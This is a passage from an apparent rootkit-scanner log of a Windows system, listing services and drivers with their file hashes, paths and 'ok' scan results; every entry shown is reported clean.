73B4C72FB6170A08C64BDA92DE93ECF7, 766BBE659232F0F5EAEE577EE88091FB76175BC52D65B9637126069C97E795D4 ] NdisTapi C:\WINDOWS\system32\DRIVERS\ndistapi.sys 21:37:21.0583 0x1ac0 NdisTapi - ok 21:37:21.0599 0x1ac0 [ 6704F27EB15A5B30AA7FA5A4F4D1FD47, 841F99B3C751F4D4E23C0E7B5C275B4871C1D5EF937A93129DF64DF49F6B6736 ] Ndisuio C:\WINDOWS\system32\drivers\ndisuio.sys 21:37:21.0614 0x1ac0 Ndisuio - ok 21:37:21.0614 0x1ac0 [ FE87CCAA89433FC306A80F15E848F4B2, 3269FDF53DA59057E066D582FCBB96B71C8063B8F488856A9DEA414B4797E43A ] NdisVirtualBus C:\WINDOWS\System32\drivers\NdisVirtualBus.sys 21:37:21.0614 0x1ac0 NdisVirtualBus - ok 21:37:21.0630 0x1ac0 [ 94517BC9F29A1B73D377F1BF1C3DCA34, 45A34D7AAA851C643E80C0F61CBF8544B8A2E8E7DAB2D5AB6F3A34FDEE4AB0B3 ] NdisWan C:\WINDOWS\System32\drivers\ndiswan.sys 21:37:21.0646 0x1ac0 NdisWan - ok 21:37:21.0661 0x1ac0 [ 94517BC9F29A1B73D377F1BF1C3DCA34, 45A34D7AAA851C643E80C0F61CBF8544B8A2E8E7DAB2D5AB6F3A34FDEE4AB0B3 ] ndiswanlegacy C:\WINDOWS\system32\DRIVERS\ndiswan.sys 21:37:21.0692 0x1ac0 ndiswanlegacy - ok 21:37:21.0708 0x1ac0 [ AC6AC99075732F5C29DB0004DD5B1AC6, 684EC821EF5C60DA540CA36EC192B09E62440AAD5B13F0F4C23DDC4A9B96F28C ] ndproxy 
C:\WINDOWS\system32\DRIVERS\NDProxy.sys 21:37:21.0724 0x1ac0 ndproxy - ok 21:37:21.0724 0x1ac0 [ 9AC090451D92E6081EB89CDA83D74189, D4D442412F112853AA8D88DFB5F695AE4E8E2C361905992537EE53BE675FECE8 ] Ndu C:\WINDOWS\system32\drivers\Ndu.sys 21:37:21.0755 0x1ac0 Ndu - ok 21:37:21.0771 0x1ac0 [ A115DDB2C7805C41EEC9A5276FF5764E, FC81D0BE2DAAC6E7161C0FC5C90050022A39AD50E28040D5357C0E1FD6C0B6B5 ] NetAdapterCx C:\WINDOWS\system32\drivers\NetAdapterCx.sys 21:37:21.0786 0x1ac0 NetAdapterCx - ok 21:37:21.0802 0x1ac0 [ F420B6CAB5151A38E4DBBFFB500C11DA, 271F495B261461B8EA847BFDD87C155E6DC1B6236C161B8253A1F023706B1B1D ] NetBIOS C:\WINDOWS\system32\drivers\netbios.sys 21:37:21.0817 0x1ac0 NetBIOS - ok 21:37:21.0833 0x1ac0 [ 30C2F67EC84EB11B22011620107E0325, 98088685F457566FD8D13B83A0BF6B06CDC70AC156B67BF87A8A8446C150C1F3 ] NetBT C:\WINDOWS\system32\DRIVERS\netbt.sys 21:37:21.0864 0x1ac0 NetBT - ok 21:37:21.0880 0x1ac0 [ EABFCDA6E996F8A32DC1B302F7683BB2, 5FF2BA89D9A7BDE78C40866F15EC576527699ADD0F120E1A8388C4404A69F0E8 ] Netlogon C:\WINDOWS\system32\lsass.exe 21:37:21.0896 0x1ac0 Netlogon - ok 21:37:21.0896 0x1ac0 [ D9FF8CA42C3541F4840693F17143C595, B05FB0B6439B34BD93EE59DC48BBE3D712A7428EFBFE37A887CE8546E57EE68F ] Netman C:\WINDOWS\System32\netman.dll 21:37:21.0942 0x1ac0 Netman - ok 21:37:21.0942 0x1ac0 [ 4D37150AB4D61598919AB70ACFD1369A, 9ABF73213988ED9AA72B2658F8B91967A24C7CC2049859D86CE9C51A4AB57A84 ] NetMsmqActivator C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe 21:37:21.0958 0x1ac0 NetMsmqActivator - ok 21:37:21.0958 0x1ac0 [ 4D37150AB4D61598919AB70ACFD1369A, 9ABF73213988ED9AA72B2658F8B91967A24C7CC2049859D86CE9C51A4AB57A84 ] NetPipeActivator C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe 21:37:21.0989 0x1ac0 NetPipeActivator - ok 21:37:22.0005 0x1ac0 [ 96173660A4DD4A56E4B8938A67DAD9B7, F1D8F94625C6461DB89F8D3BDC73748F8A7F3446694BD1F148AF9BE6F17E9543 ] netprofm C:\WINDOWS\System32\netprofmsvc.dll 21:37:22.0052 0x1ac0 netprofm - ok 21:37:22.0067 
0x1ac0 [ 79C810D49E6D2825F51B0D7CAA6E2FAD, 19B7FB87FC8CE8FEA456F06D32099ED5B69FE38D2954580D4CEC32998D206E9F ] NetSetupSvc C:\WINDOWS\System32\NetSetupSvc.dll 21:37:22.0083 0x1ac0 NetSetupSvc - ok 21:37:22.0083 0x1ac0 [ 4D37150AB4D61598919AB70ACFD1369A, 9ABF73213988ED9AA72B2658F8B91967A24C7CC2049859D86CE9C51A4AB57A84 ] NetTcpActivator C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe 21:37:22.0099 0x1ac0 NetTcpActivator - ok 21:37:22.0099 0x1ac0 [ 4D37150AB4D61598919AB70ACFD1369A, 9ABF73213988ED9AA72B2658F8B91967A24C7CC2049859D86CE9C51A4AB57A84 ] NetTcpPortSharing C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe 21:37:22.0114 0x1ac0 NetTcpPortSharing - ok 21:37:22.0114 0x1ac0 [ 8C03F2F5A9E93AEB08B3AEE51552394A, F95185FB8D5FDEAB39E593488BA6ABCFA9C081BFED05008E0CD95F29B894AFC8 ] netvsc C:\WINDOWS\System32\drivers\netvsc.sys 21:37:22.0130 0x1ac0 netvsc - ok 21:37:22.0255 0x1ac0 [ EB21C7273B46C148329EB3DE48E61946, A8391B69FE02A860DFFC25EF8FC53EC4ED55211C5606DC5C85A4C21A5B4A7820 ] NETwNs64 C:\WINDOWS\System32\drivers\Netwsw02.sys 21:37:22.0427 0x1ac0 NETwNs64 - ok 21:37:22.0645 0x1ac0 [ 93EEA7EDA04968033DBA775A829962A4, 2E0A6772B4D9AE41E172A3239413ED4231B5F94305CE4FCF43193D2A3EFFF53D ] Netwtw04 C:\WINDOWS\system32\DRIVERS\Netwtw04.sys 21:37:22.0794 0x1ac0 Netwtw04 - ok 21:37:22.0809 0x1ac0 [ 0C124EAC0EF7B3767280C94A8C03615B, D10216726A221C8FBC67C47F4B266C271A7C7A4438F77AC44BB561E0A6EB6D34 ] NgcCtnrSvc C:\WINDOWS\System32\NgcCtnrSvc.dll 21:37:22.0841 0x1ac0 NgcCtnrSvc - ok 21:37:22.0856 0x1ac0 [ 9ECFD7DD594DBEAED3A2889045B2DCBD, 984B10A88E304B805153C49B3D618315926635A270AB34D2976E7AA5AE00E2F4 ] NgcSvc C:\WINDOWS\system32\ngcsvc.dll 21:37:22.0919 0x1ac0 NgcSvc - ok 21:37:22.0919 0x1ac0 [ 50F98CD010326B58F09082BACF3123AE, 124446A2905E23BB3F5763E347842F3F511EC44C37C2F85E409F73EC8F53924E ] NlaSvc C:\WINDOWS\System32\nlasvc.dll 21:37:23.0012 0x1ac0 NlaSvc - ok 21:37:23.0028 0x1ac0 [ 6D8F6A9C53CFB0C49E8251A442B7283F, 
C3E913E4997C35A9B4C2E613A499F01D15264EAB699B93269B690B2A74A70E9A ] Npfs C:\WINDOWS\system32\drivers\Npfs.sys 21:37:23.0059 0x1ac0 Npfs - ok 21:37:23.0075 0x1ac0 [ BABF7E1757D6908941C9F9CBD66A5EF0, 323E743CB26583763A9C5DE64E7E08138CB8D3E2DE0A8BCE9F774E1C7426E7F8 ] npsvctrig C:\WINDOWS\System32\drivers\npsvctrig.sys 21:37:23.0106 0x1ac0 npsvctrig - ok 21:37:23.0106 0x1ac0 [ A85EB5721C7203AAAAAA04F551960CD9, E61ED728E154799346C749159BFE36FAEB2CE64FC5735F533B910017D66A7EE5 ] nsi C:\WINDOWS\system32\nsisvc.dll 21:37:23.0137 0x1ac0 nsi - ok 21:37:23.0153 0x1ac0 [ 7A6BA778B48DF9FB7AC231D4FF6E3248, 5959CA59C75D2C4DD8A539CAA8D99EF6A0CB5AA3F0D485B14C8B35911748F1F7 ] nsiproxy C:\WINDOWS\system32\drivers\nsiproxy.sys 21:37:23.0169 0x1ac0 nsiproxy - ok 21:37:23.0278 0x1ac0 [ 731FD52461C8107E5B19B9AEDBB82BFB, 51B6722B9B2863B4AE23CE6B1DBD8481DA341748196BD482C6C5F4A6959F24F9 ] NTFS C:\WINDOWS\system32\drivers\NTFS.sys 21:37:23.0356 0x1ac0 NTFS - ok 21:37:23.0356 0x1ac0 [ 4FFB2D5655D10700D5B8E205C4DB86BD, 69078960669A373F9C2D47AF2ED841619831106B681EBAAEAAE5BD569A54CE6D ] Null C:\WINDOWS\system32\drivers\Null.sys 21:37:23.0372 0x1ac0 Null - ok 21:37:23.0372 0x1ac0 [ 99EB6376EC2C03CE5F668577651E3454, A783FFBF89A9074E2074ACAF3F55862DF2F05CAFEAF6A2D509DDA665EB0D59CB ] nvdimmn C:\WINDOWS\System32\drivers\nvdimmn.sys 21:37:23.0387 0x1ac0 nvdimmn - ok 21:37:23.0653 0x1ac0 [ 76F187A361C4005708CB6372B4C43264, 81F1ADA87D2D9647368C2D87C0FFFA52430708A6075C03066C3ADD9EFBE353FF ] nvlddmkm C:\WINDOWS\System32\DriverStore\FileRepository\nvltwu.inf_amd64_c8da725822079174\nvlddmkm.sys 21:37:23.0981 0x1ac0 nvlddmkm - ok 21:37:23.0997 0x1ac0 [ 3DB2E9E207358BFBD09B77B5119ECA5B, 55FED85EFC06B7AB5031D9986E4E4D2FA8841C549081ABBA9F9D9BBAB7852B37 ] nvraid C:\WINDOWS\system32\drivers\nvraid.sys 21:37:24.0012 0x1ac0 nvraid - ok 21:37:24.0012 0x1ac0 [ 4C04BFBD4DB2EECCC47F5FA39D65BB6E, 9312DC4F7000991946D92D87DD9D37D70E336629EDBA553BFC79804049E34B73 ] nvstor C:\WINDOWS\system32\drivers\nvstor.sys 21:37:24.0028 
0x1ac0 nvstor - ok 21:37:24.0059 0x1ac0 [ 85397430F424516BF8300FAAEF929366, 2EDF41407C7483AC8E4703BC0A13F764563E4B00D6923FD4678E6E361AC14D6B ] nvsvc C:\WINDOWS\system32\nvvsvc.exe 21:37:24.0122 0x1ac0 nvsvc - ok 21:37:24.0200 0x1ac0 [ C20A9055FD4372F3773C6F97A8EBA144, 8A241EB402946470B6ADCEBAA3CE6A04E2AD86FC23AA451299C46B4073CEA142 ] NVWMI C:\Windows\system32\nvwmi64.exe 21:37:24.0294 0x1ac0 NVWMI - ok 21:37:24.0309 0x1ac0 [ 0D611DC17E48B6F8DD466A089170D118, E55A78E2CC6A0A5F7B8F0B75DFB2297FBC3B959C4FDEFBEA1C6C4E7706724AEB ] OneSyncSvc C:\WINDOWS\System32\APHostService.dll 21:37:24.0341 0x1ac0 OneSyncSvc - ok 21:37:24.0356 0x1ac0 [ F5F10CE848CAF07A12A7B92290DBA38A, AC6AC13B692D07A6853B24A6396F1C3388586FD5D528F79FA3E373428D54D29A ] p2pimsvc C:\WINDOWS\system32\pnrpsvc.dll 21:37:24.0403 0x1ac0 p2pimsvc - ok 21:37:24.0419 0x1ac0 [ D1A9C22A98A10EB11A190B8FC7C07C6A, 1DE5F07E707DA9D833F105A8D948BBAEF0172DB2147D9A665EC7320F88D57B9E ] p2psvc C:\WINDOWS\system32\p2psvc.dll 21:37:24.0450 0x1ac0 p2psvc - ok 21:37:24.0466 0x1ac0 [ 2CC6C325B271C7CA60F374F8F868CB45, 569391CA5DF003ED33CAA89FD38834641023C24F7FAE2261F6DA8ABC5CC9C3C9 ] Parport C:\WINDOWS\System32\drivers\parport.sys 21:37:24.0481 0x1ac0 Parport - ok 21:37:24.0497 0x1ac0 [ 664B7DDEE982ADF5EAB480C75B9F6218, 1D1403CBD75916B83EEFA9B235E237583C40025C87C13676247F1EAD3F1D33EE ] partmgr C:\WINDOWS\system32\drivers\partmgr.sys 21:37:24.0569 0x1ac0 partmgr - ok 21:37:24.0581 0x1ac0 [ 72ABB842C15A6C3AC3D954308C6BF206, 8F2A69E3BE43BCD2C8A39153062216B5CCEC9FA62205EC8A23FAB209DFAE7062 ] PcaSvc C:\WINDOWS\System32\pcasvc.dll 21:37:24.0628 0x1ac0 PcaSvc - ok 21:37:24.0659 0x1ac0 [ C5B74C6D87E77BC64DEBD1BF57DEB375, AEBC86E404D4E3985D9FBAD9913AC52127DDE7C79062830717CDFEEA4CD7CC0B ] pci C:\WINDOWS\system32\drivers\pci.sys 21:37:24.0706 0x1ac0 pci - ok 21:37:24.0706 0x1ac0 [ CFB85CB7A6F6926EA0EB96EDFB3C8A91, 7B3A58C165DF231BB202D8A2036272932439864F8EBDC62811E2BEFA8B36FC01 ] pciide C:\WINDOWS\system32\drivers\pciide.sys 21:37:24.0722 
0x1ac0 pciide - ok 21:37:24.0722 0x1ac0 [ 13B7D84B397A90E82682C47A15C3A98D, 7F897DA83209381A8C26B34416899E276256AB587DC4E2B60B185CAC8D1877F0 ] pcmcia C:\WINDOWS\system32\drivers\pcmcia.sys 21:37:24.0737 0x1ac0 pcmcia - ok 21:37:24.0753 0x1ac0 [ 76EA512FD9D4673CF7A57775EE8922E2, 6D2B90616A46BC4F9BB6BACBD78EB33C23834987365C87617AFC2E147871C984 ] pcw C:\WINDOWS\system32\drivers\pcw.sys 21:37:24.0753 0x1ac0 pcw - ok 21:37:24.0769 0x1ac0 [ 4A88D29869609A39782EF53145E6F7CA, 6200E0B96FD0289D7F95779723E3CABBDEE17EDE5F802CC51E5539F475711027 ] pdc C:\WINDOWS\system32\drivers\pdc.sys 21:37:24.0784 0x1ac0 pdc - ok 21:37:24.0800 0x1ac0 [ 4F190BA3C9BD2F0277BCBF480F396091, F09613C76350706992B39D7EA9B859D28F00790E5AC17CA7D49C3E270B9D8994 ] PEAUTH C:\WINDOWS\system32\drivers\peauth.sys 21:37:24.0862 0x1ac0 PEAUTH - ok 21:37:24.0909 0x1ac0 [ F5C8E47E2F7B72ACEA49F7AD2EA60D3B, 184B5C91BF36A03257A38E8FB5FDBEF96AE88F0F5FF2EEEAE7BFC6CA15CC1602 ] PeerDistSvc C:\WINDOWS\system32\peerdistsvc.dll 21:37:25.0019 0x1ac0 PeerDistSvc - ok 21:37:25.0019 0x1ac0 [ FE52FF97A094609429FEF098EDC6FB08, 6762ED340048AF61B756CB7B576BE2057768FDB677623D01F2A592727C0E5A00 ] percsas2i C:\WINDOWS\system32\drivers\percsas2i.sys 21:37:25.0034 0x1ac0 percsas2i - ok 21:37:25.0034 0x1ac0 [ FCA143274792F12383C35902E801E83A, 87D93226E32153794993035553C9935D07242631E182460D8ED13650175C0F01 ] percsas3i C:\WINDOWS\system32\drivers\percsas3i.sys 21:37:25.0050 0x1ac0 percsas3i - ok 21:37:25.0081 0x1ac0 [ 4DAD2C73778D41F951B33854936E7BDC, 1421FDA2D083D5923422A038C54603BF798C48DDB7244DBEDA46D537B8CE1534 ] PerfHost C:\WINDOWS\SysWow64\perfhost.exe 21:37:25.0128 0x1ac0 PerfHost - ok 21:37:25.0191 0x1ac0 [ B730E963A31B73938A76D7B80666D60D, FADF452637E2EB50CC8C0E75956FE01F029C587F6EF2F8B347213263DE9D3A80 ] PhoneSvc C:\WINDOWS\System32\PhoneService.dll 21:37:25.0253 0x1ac0 PhoneSvc - ok 21:37:25.0269 0x1ac0 [ 97D85602B8131C487EB08A36F7343F5E, BEDC106AF06358D40BB034390645A5BFF9C138CFD51B5997D32614741D3D2372 ] PimIndexMaintenanceSvc 
C:\WINDOWS\System32\PimIndexMaintenance.dll 21:37:25.0284 0x1ac0 PimIndexMaintenanceSvc - ok 21:37:25.0316 0x1ac0 [ F9FB601621FF33376F3908C2C27C6EF4, 8689565D4FD1C68826EA0A9C2B44377A2AEC3CD812595F0D32904D8FA5809672 ] pla C:\WINDOWS\system32\pla.dll 21:37:25.0378 0x1ac0 pla - ok 21:37:25.0378 0x1ac0 [ A2BACEBAC01BE7A6656B454E75C23262, C2C168718A341D48679AC4CA8005BD06E9F1F0D1F7C72D3C30A7A8CE1F665A43 ] PlugPlay C:\WINDOWS\system32\umpnpmgr.dll 21:37:25.0394 0x1ac0 PlugPlay - ok 21:37:25.0394 0x1ac0 [ 414CA4DCC31D795882B25ADC1DACE779, AFD8D9AA24C64DD9569FDCBE65171810FE27AF24B8DD2941FECE6245EABB6AAC ] pmem C:\WINDOWS\System32\drivers\pmem.sys 21:37:25.0409 0x1ac0 pmem - ok 21:37:25.0409 0x1ac0 [ D54385DD5A39A5636D1587FC9ECFC337, DEEA5D433CB2DA55AE58C7C5431A1249C94B61606F0A75E4A44D516619060263 ] PNRPAutoReg C:\WINDOWS\system32\pnrpauto.dll 21:37:25.0425 0x1ac0 PNRPAutoReg - ok 21:37:25.0441 0x1ac0 [ F5F10CE848CAF07A12A7B92290DBA38A, AC6AC13B692D07A6853B24A6396F1C3388586FD5D528F79FA3E373428D54D29A ] PNRPsvc C:\WINDOWS\system32\pnrpsvc.dll 21:37:25.0456 0x1ac0 PNRPsvc - ok 21:37:25.0472 0x1ac0 [ 118E91AEE8F6DDAD088F955498CF2487, F4447C64CF1F36432E0FF09B6712DCE61BF28E3499F20C6C69E80D98B42D671E ] PolicyAgent C:\WINDOWS\System32\ipsecsvc.dll 21:37:25.0487 0x1ac0 PolicyAgent - ok 21:37:25.0503 0x1ac0 [ F6A0B848F75CF55E3980EA0FADCBA317, 11D8B12B4DE867B180965B0F2FD0F362265C518F76FE3351A2B7C9C2FFC5E137 ] Power C:\WINDOWS\system32\umpo.dll 21:37:25.0503 0x1ac0 Power - ok 21:37:25.0519 0x1ac0 [ A39C2177E696BA60B0C5A6A9BCF90D2D, ED70D294B7429ED9ED436B2E98D32D53C76CA23BCB973A0BCA1CD9E5C057EECB ] Power Manager DBC Service C:\Program Files (x86)\ThinkPad\Utilities\PWMDBSVC.EXE 21:37:25.0519 0x1ac0 Power Manager DBC Service - ok 21:37:25.0534 0x1ac0 [ D292D7FADCEE481CC64A9DE8FE9C3347, BD870A375E33CD8434CA97FFE9C2F84E58C6CD0EAEEEE8922172CB01F9674B55 ] PptpMiniport C:\WINDOWS\System32\drivers\raspptp.sys 21:37:25.0550 0x1ac0 PptpMiniport - ok 21:37:25.0597 0x1ac0 [ 
5404E7A968A26DF03793B6F68536594D, BE5A85581E87EFE4DB43AD17B8D42D3F7F32364AEEC1416DBB94279C4A203FF2 ] PrintNotify C:\WINDOWS\system32\spool\drivers\x64\3\PrintConfig.dll 21:37:25.0800 0x1ac0 PrintNotify - ok 21:37:25.0816 0x1ac0 [ D57CF871B3977731A91FE9611A54C7C1, B6C7F685716A88D0978377B83C5320C88EED0CAA44A001849AAFF71E4E0682E7 ] Processor C:\WINDOWS\System32\drivers\processr.sys 21:37:25.0831 0x1ac0 Processor - ok 21:37:25.0847 0x1ac0 [ 56A7713DE64B16FB309D132E88FDB098, A658C8DCA87442F33B726A9B2060B20393D83B8658D0894C046CAFEAB00E2D8A ] ProfSvc C:\WINDOWS\system32\profsvc.dll 21:37:25.0894 0x1ac0 ProfSvc - ok 21:37:25.0894 0x1ac0 [ B60431D2A046AD97F8427F6E568370F5, CD488E343585A5AC19D9AAF88BF0BB7EEA1BC48F6DA4A4FBF9BE5A04ECF5040B ] Psched C:\WINDOWS\system32\drivers\pacer.sys 21:37:25.0909 0x1ac0 Psched - ok 21:37:25.0909 0x1ac0 [ E0DCCA2A78516D155A6485CCA99F0EA5, EAFD24F815ECD6373BEC8E75B24FB54694CB8E4FF430FB6886F9B5B1C1762BFC ] QWAVE C:\WINDOWS\system32\qwave.dll 21:37:25.0941 0x1ac0 QWAVE - ok 21:37:25.0941 0x1ac0 [ A2B0F46FBA2521E7E732BDBDB1238515, 7F0FEFB09770BF5889D6C2219F68399C962A3F1071E70C4951B6FDAE196CF041 ] QWAVEdrv C:\WINDOWS\system32\drivers\qwavedrv.sys 21:37:25.0956 0x1ac0 QWAVEdrv - ok 21:37:25.0956 0x1ac0 [ EA9EB06EFC325CD2ACF5DF2F26A4894E, 32AC7EDB42CDA736E2AD9AB67795735F16234D9BD80D56FDAE5B8B3C3C1CC26F ] RasAcd C:\WINDOWS\system32\DRIVERS\rasacd.sys 21:37:25.0972 0x1ac0 RasAcd - ok 21:37:25.0972 0x1ac0 [ 4E9379389D0A851DD19D130C8FAEFBD0, 279A25EF8949A5BAF311CA75493A5F89F74A02711EF875F67D0A95849B409C00 ] RasAgileVpn C:\WINDOWS\System32\drivers\AgileVpn.sys 21:37:26.0003 0x1ac0 RasAgileVpn - ok 21:37:26.0003 0x1ac0 [ 3E8CB44832FE3F96047187291523CDA1, 999A10D4D50CD2C39309FDC04A9F4CB0959BA061AE9305D4DF7F00F37F3813F9 ] RasAuto C:\WINDOWS\System32\rasauto.dll 21:37:26.0019 0x1ac0 RasAuto - ok 21:37:26.0019 0x1ac0 [ 5279EC98F6218D29EADDFECCC0D80E9A, 6F376FC3BEFA9F521635192177962AF1F41173502EC067896B7C2A5FB71E7A3B ] Rasl2tp 
C:\WINDOWS\System32\drivers\rasl2tp.sys 21:37:26.0050 0x1ac0 Rasl2tp - ok 21:37:26.0066 0x1ac0 [ AC6A0AE3B33EE783717820458882F91C, EA503A90DBC31FB6B5D047D59E0F2855880EF3877877AD576579DB5CD8188E4A ] RasMan C:\WINDOWS\System32\rasmans.dll 21:37:26.0097 0x1ac0 RasMan - ok 21:37:26.0112 0x1ac0 [ D7FF75ED7A48FD60A573C9E959CF4DB5, C67673E2D678527F8C07C9BCC487D385B92282D9D73396CFB01F14F5211CA991 ] RasPppoe C:\WINDOWS\system32\DRIVERS\raspppoe.sys 21:37:26.0112 0x1ac0 RasPppoe - ok 21:37:26.0128 0x1ac0 [ 6A4E45A7F17FA0B4B1B48C550E311944, 1E84A559B7AA5F07E8156D223EFFB1B2B43D1E4E90E561D8DF2C257FFBCFDC0D ] RasSstp C:\WINDOWS\System32\drivers\rassstp.sys 21:37:26.0144 0x1ac0 RasSstp - ok 21:37:26.0159 0x1ac0 [ F2C575A9657F7B2E027C6CE7BC8F1A2D, 5D002488CCEDCEBF0542F508FCE47DC9105C67D5685489970048437BD243AC0E ] rdbss C:\WINDOWS\system32\DRIVERS\rdbss.sys 21:37:26.0175 0x1ac0 rdbss - ok 21:37:26.0175 0x1ac0 [ 9414B22E093243636D362BF8C8C12A67, 575CE91AFADD771CBF86377962EDFAF70150BBA575F8DF144FEE6CC1C0FF88E0 ] rdpbus C:\WINDOWS\System32\drivers\rdpbus.sys 21:37:26.0191 0x1ac0 rdpbus - ok 21:37:26.0191 0x1ac0 [ 53A01D3FDB701AC5D9DDE4140227E3D9, 833AF0BAAB49B58C71C684D2AA20B900C27E19DDCE5E15355C7ABAAB33BC7673 ] RDPDR C:\WINDOWS\system32\drivers\rdpdr.sys 21:37:26.0206 0x1ac0 RDPDR - ok 21:37:26.0222 0x1ac0 [ DF32ED51DC0C3F6F3B1C4CEF71B8B426, DBEAD271B5DE6439E3106BDDB8B1E47D7BA47AE203CF3E1F8924CE02FDCA6E0B ] RdpVideoMiniport C:\WINDOWS\system32\drivers\rdpvideominiport.sys 21:37:26.0222 0x1ac0 RdpVideoMiniport - ok 21:37:26.0237 0x1ac0 [ 2369A5B651308E0C3458143976E9B03B, 0EDE99F7E2A7668E90C2FCA11D4BCE0676FBEA2CCFB57A004827CE5FE96D1584 ] rdyboost C:\WINDOWS\system32\drivers\rdyboost.sys 21:37:26.0237 0x1ac0 rdyboost - ok 21:37:26.0269 0x1ac0 [ 3581FB9529035F8EC6DB681664CA70B1, 0C7BCD6A3B4248683C52B69F0B373D5929C2375F9BBF6CA80C480A8E7446A30C ] ReFS C:\WINDOWS\system32\drivers\ReFS.sys 21:37:26.0331 0x1ac0 ReFS - ok 21:37:26.0347 0x1ac0 [ 79E1ADE19D8B7C56EF29D098EAF57AD0, 
AF5C68B85EE1503ACD4AEA1D997F816C34293A77791D59A605DC18450B4906DE ] WFPLWFS C:\WINDOWS\system32\drivers\wfplwfs.sys 21:37:34.0454 0x1ac0 WFPLWFS - ok 21:37:34.0454 0x1ac0 [ 2DEB40D6837956CE08A8F9EB3ECA5A01, B40D23E54CDF6BE05D6C5DA536BF6D998E79EDE9C391A42452F9F69EE206EA1E ] WiaRpc C:\WINDOWS\System32\wiarpc.dll 21:37:34.0470 0x1ac0 WiaRpc - ok 21:37:34.0485 0x1ac0 [ F6940C388C10E41FDA8FC74EA8061FB4, 7FA31501B2FBF684C832E6E7A254550CAAFA41176CE7B24F930B6BD4EE68168D ] WIBUKEY C:\WINDOWS\system32\DRIVERS\WibuKey64.sys 21:37:34.0485 0x1ac0 WIBUKEY - ok 21:37:34.0501 0x1ac0 [ 75014BF6510D4C6C69EEE5B7743A52AF, 11AEEF4D52C35E5A7006713836ECF1198A53CD02736E792B1C698144CA1363F0 ] WIMMount C:\WINDOWS\system32\drivers\wimmount.sys 21:37:34.0501 0x1ac0 WIMMount - ok 21:37:34.0501 0x1ac0 WinDefend - ok 21:37:34.0516 0x1ac0 [ C8EBCFED8FD2CDF725E44AF93016621E, A0B76E55CC535A0F1D79C3C0EC59753086EAB669EC7ADA4F97656DCAD2A69448 ] WindowsTrustedRT C:\WINDOWS\system32\drivers\WindowsTrustedRT.sys 21:37:34.0532 0x1ac0 WindowsTrustedRT - ok 21:37:34.0532 0x1ac0 [ D318557F9D7CA3836104F0B8ECB1F32E, 6850BBFB4F65167B052F3CA22FD72E9188A14FD2A9CC085861B4BC40CBA34249 ] WindowsTrustedRTProxy C:\WINDOWS\system32\drivers\WindowsTrustedRTProxy.sys 21:37:34.0548 0x1ac0 WindowsTrustedRTProxy - ok 21:37:34.0563 0x1ac0 [ 61F0D6574577499FB43D9F4870B08A7F, 757ACD4F292C43B04B6428D84A7147DE8E565716D94B6B02F288F3B5E2D1C135 ] WinHttpAutoProxySvc C:\WINDOWS\system32\winhttp.dll 21:37:34.0595 0x1ac0 WinHttpAutoProxySvc - ok 21:37:34.0610 0x1ac0 [ 31DDF1D001336B2DCE7DF24E99EF1D04, A1FCABF4A263BFAE042FE7A9F6C15FD9B3D8E985278C32AE8975ECE79B341277 ] WinMad C:\WINDOWS\System32\drivers\winmad.sys 21:37:34.0626 0x1ac0 WinMad - ok 21:37:34.0626 0x1ac0 [ 9A26F7834706A6D8C8824EB08FD7C362, 750F6A0759D70BE481C70FE4BB21D18E756A8F0C23A014C2CE1E7729A1E625FE ] Winmgmt C:\WINDOWS\system32\wbem\WMIsvc.dll 21:37:34.0657 0x1ac0 Winmgmt - ok 21:37:34.0657 0x1ac0 [ 2E1A614EFB0523E20860AE7978DDA0A4, 
E13564690F9977747CA676D3843B467506447F060A5FF6676835A9C7A30BA409 ] WinNat C:\WINDOWS\system32\drivers\winnat.sys 21:37:34.0673 0x1ac0 WinNat - ok 21:37:34.0735 0x1ac0 [ 27DAA9AA3E03C1068678D5659461BB32, AFDED6D671C430F296C9EAA73590111D6A8A9FA93DFE0595B90467FFE28EFB35 ] WinRM C:\WINDOWS\system32\WsmSvc.dll 21:37:34.0845 0x1ac0 WinRM - ok 21:37:34.0845 0x1ac0 [ 03858B18BB6DF6A400D9FC5153FD28A8, C7AD69B022AEFDDDAFB74CCCDF20AF9CCDBA0097634BBBD07A2EFBA5922560C1 ] WINUSB C:\WINDOWS\System32\drivers\WinUSB.SYS 21:37:34.0876 0x1ac0 WINUSB - ok 21:37:34.0876 0x1ac0 [ 0BF4A43CF1F3A4D50AFA4561C3B4628D, 2D0B4E7004C8AC8A9EE07E6D5241BF32395CA142BF3B03FA9CF00BC6720A6AC7 ] WinVerbs C:\WINDOWS\System32\drivers\winverbs.sys 21:37:34.0907 0x1ac0 WinVerbs - ok 21:37:34.0923 0x1ac0 [ 11DDD4C9BDF095A5F5B5ACA98FBBF7A2, CFA76C197987CC9EBFE4AC2AD6FE9A9620819B50E9DD423BCE13F7DB5DA641D8 ] wisvc C:\WINDOWS\system32\flightsettings.dll 21:37:34.0985 0x1ac0 wisvc - ok 21:37:35.0032 0x1ac0 [ E624376E7E7D9AC203113140D9E618A2, 3553D343665194492E38B8C437DE429CEAC135D69EC0CB951BA3E3A7549F673E ] WlanSvc C:\WINDOWS\System32\wlansvc.dll 21:37:35.0126 0x1ac0 WlanSvc - ok 21:37:35.0188 0x1ac0 [ 2393C4DB3DF3D19B0B920AD607098E79, D632671247DE3808D9C5B36A3FF173C86BB3AD274D03C851BCD417CE62B3820D ] wlidsvc C:\WINDOWS\system32\wlidsvc.dll 21:37:35.0282 0x1ac0 wlidsvc - ok 21:37:35.0313 0x1ac0 [ E5AB2E0B4F766E34AFC768D9769A24D7, 0DE04B2F43B9DCC92F9215B1058EE4ABA228B9986051CF39959555C12DF017B3 ] wlpasvc C:\WINDOWS\System32\lpasvc.dll 21:37:35.0376 0x1ac0 wlpasvc - ok 21:37:35.0376 0x1ac0 [ 0D6E1347A891607759340B1E55BA2A77, 033DF14920A581FE7E21C6930280AE159B5634F2FEAF79423E8D0B7D46500048 ] WmiAcpi C:\WINDOWS\System32\drivers\wmiacpi.sys 21:37:35.0376 0x1ac0 WmiAcpi - ok 21:37:35.0391 0x1ac0 [ F7B122E8A238354DE344B77216E8D9AC, 3C4F864655CFF786B33333E643AA929B2D2B01ECD56EEEEADE7CEAB38249DA3B ] wmiApSrv C:\WINDOWS\system32\wbem\WmiApSrv.exe 21:37:35.0407 0x1ac0 wmiApSrv - ok 21:37:35.0407 0x1ac0 WMPNetworkSvc - ok 
